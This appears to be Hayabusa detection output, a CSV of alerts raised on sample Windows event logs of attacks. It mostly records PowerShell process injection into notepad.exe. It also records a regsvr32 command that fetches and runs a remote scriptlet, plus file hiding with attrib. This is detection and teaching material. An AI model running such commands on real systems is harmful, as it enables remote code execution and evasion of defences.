2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:18.833 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:18.833 +09:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:50:36.889 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,rules/sigma/process_creation/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
